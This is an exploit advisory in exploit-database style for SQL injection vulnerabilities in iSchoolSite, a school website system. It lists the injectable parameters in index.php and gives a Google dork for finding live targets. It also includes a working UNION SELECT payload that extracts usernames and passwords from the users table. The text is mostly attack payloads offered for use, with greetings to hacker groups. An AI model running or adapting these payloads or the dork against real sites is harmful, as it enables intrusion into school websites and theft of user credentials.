==========================================================================

# Exploit Title: iSchoolSite SQL Injection Vulnerability
# Date: 16.10.2011
# Author: poach3r
# Software Link: http://www.ischoolsite.com/
# Tested on: Windows XP SP3
# Google Dork: "Powered by iSchoolSite" inurl:.php
# Price: $5000

==========================================================================
# Vulnerable File : 

==>index.php<==

# Exploit :

http://127.0.0.1/path/index.php?task=calendar&pf=yes&pid=[SQL]&cmonth=[SQL]&cyear=[SQL]

http://127.0.0.1/path/index.php?task=news&view=yes&nid=[SQL]

http://127.0.0.1/path/index.php?task=&pf=yes&pid=[SQL]

# Demo :

http://127.0.0.1/path/index.php?task=news&view=yes&nid=-1/**/union/**/select/**/1,concat(username,0x3a,passsword),3,4,5,6,7/**/from/**/users/*

==========================================================================
# GreetZ To : All IRANIAN HackerZ

./End